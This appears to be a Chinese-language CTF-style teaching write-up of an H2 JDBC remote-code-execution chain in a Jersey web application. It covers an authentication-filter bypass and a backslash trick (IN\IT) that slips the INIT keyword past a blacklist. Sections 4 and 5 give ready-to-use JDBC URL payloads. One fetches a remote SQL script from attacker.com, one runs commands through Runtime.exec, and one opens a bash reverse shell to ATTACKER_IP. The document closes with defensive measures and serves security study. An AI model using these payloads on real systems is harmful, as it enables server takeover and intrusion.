H2 JDBC RCE漏洞分析与利用教学文档<\/h1>

1. 环境搭建<\/h2>

1.1 本地调试环境准备<\/h3>

获取题目提供的war包<\/li>
将war包放入tomcat的webapp目录中<\/li>
在tomcat的startup.bat中加入debug参数以启用调试模式<\/li>

启动tomcat环境<\/li> <\/ol>

1.2 IDEA调试配置<\/h3>

将项目的lib和classes目录添加为库<\/li>
配置JVM远程调试<\/li>

启动调试会话<\/li> <\/ol>

2. 鉴权绕过分析<\/h2>

2.1 框架与配置分析<\/h3>

项目使用Jersey框架<\/li>
鉴权由AuthenticationFilter类实现<\/li>

拦截器配置在web.xml中<\/li> <\/ul>

2.2 鉴权逻辑分析<\/h3>

白名单路由：""<\/code>, "test"<\/code>, "login"<\/code>, "register"<\/code><\/li>
目标路由：\/testConnect<\/code>（不在白名单中）<\/li>

绕过条件：

路由不在拦截器白名单中 且<\/strong> 路由不为文件 → 需要JWT验证<\/li>
任意一个条件不满足即可绕过<\/li>
<\/ul>
<\/li>
<\/ol>
2.3 绕过方法<\/h3>

利用isBaseFile<\/code>方法返回true：

路径中不包含\/<\/code><\/li>
路径包含.<\/code>字符<\/li>
<\/ul>
<\/li>
利用Jersey框架路径解析特性：

getUriInfo().getPath()<\/code>直接返回请求路径部分<\/li>
示例：http:\/\/127.0.0.1\/api\/test;test<\/code> → 返回api\/test;test\/<\/code><\/li>
<\/ul>
<\/li>
实际绕过payload：

使用;<\/code>截断<\/li>
包含.<\/code>字符使isBaseFile<\/code>返回true<\/li>
<\/ul>
<\/li>
<\/ol>
3. H2 JDBC RCE漏洞分析<\/h2>
3.1 漏洞路由分析<\/h3>

目标路由：\/testConnect<\/code><\/li>
处理类：JDBCServlet<\/code><\/li>
关键参数：jdbcUrl<\/code><\/li>
<\/ul>
3.2 限制条件<\/h3>

URL必须以jdbc:h2<\/code>开头<\/li>
自动追加;FORBID_CREATION=TRUE<\/code>（禁止创建数据库）<\/li>
黑名单过滤：禁止使用INIT<\/code>等关键字<\/li>
<\/ol>
3.3 绕过技术<\/h3>

分号转义：

使用反斜杠\<\/code>转义分号<\/li>
示例：;<\/code> → \;<\/code>（变为普通字符）<\/li>
<\/ul>
<\/li>
INIT关键字绕过：

使用\/<\/code>字符插入：IN\IT<\/code><\/li>
处理过程中\<\/code>会被忽略，还原为INIT<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
4. 漏洞利用原理深入分析<\/h2>
4.1 漏洞触发流程<\/h3>

DriverManager.getConnection()<\/code>调用<\/li>
进入H2的JdbcConnection<\/code>类<\/li>
解析连接URL：

ConnectionInfo<\/code>类处理<\/li>
readSettingsFromURL<\/code>方法提取配置<\/li>
<\/ul>
<\/li>
<\/ol>
4.2 关键处理点<\/h3>

arraySplit<\/code>方法处理URL字符串<\/li>
转义字符处理：

IN\IT<\/code>中的\<\/code>会被忽略<\/li>
I<\/code>被直接加入StringBuilder<\/code><\/li>
<\/ul>
<\/li>
最终还原为有效的INIT<\/code>命令<\/li>
<\/ol>
4.3 漏洞利用链<\/h3>

构造恶意JDBC URL：
jdbc:h2:mem:test;INIT=RUNSCRIPT FROM 'http:\/\/attacker.com\/evil.sql'\;FORBID_CREATION=TRUE
<\/code><\/pre>
<\/li>
通过反斜杠绕过黑名单检测<\/li>
服务器处理时还原为有效INIT命令<\/li>
执行远程SQL脚本实现RCE<\/li>
<\/ol>
5. 漏洞利用Payload<\/h2>
5.1 反射Payload<\/h3>
jdbc:h2:mem:test;TRACE_LEVEL_SYSTEM_OUT=3;IN\IT=CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "success";}';CALL EXEC('calc.exe')\;FORBID_CREATION=TRUE
<\/code><\/pre>
5.2 反弹Shell Payload<\/h3>
jdbc:h2:mem:test;TRACE_LEVEL_SYSTEM_OUT=3;IN\IT=CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(new String[]{"\/bin\/bash","-c",cmd});return "success";}';CALL EXEC('bash -i >& \/dev\/tcp\/ATTACKER_IP\/PORT 0>&1')\;FORBID_CREATION=TRUE
<\/code><\/pre>
6. 防御措施<\/h2>

升级H2数据库到最新安全版本<\/li>
严格过滤JDBC连接字符串：

禁止用户控制完整的JDBC URL<\/li>
实现严格的白名单机制<\/li>
<\/ul>
<\/li>
转义所有特殊字符<\/li>
使用安全管理器限制危险操作<\/li>
<\/ol>
7. 参考资源<\/h2>

DataEase修复commit: https:\/\/github.com\/dataease\/dataease\/commit\/dd35752f298b1a4079d9993b622220d321b0c8a6<\/a><\/li>
浅谈H2database的RCE漏洞: https:\/\/www.leavesongs.com\/PENETRATION\/talk-about-h2database-rce.html<\/a><\/li>
相关技术分析文章: https:\/\/mp.weixin.qq.com\/s\/laMT4-M00t8xAY_Autdb3A<\/a><\/li>
<\/ol>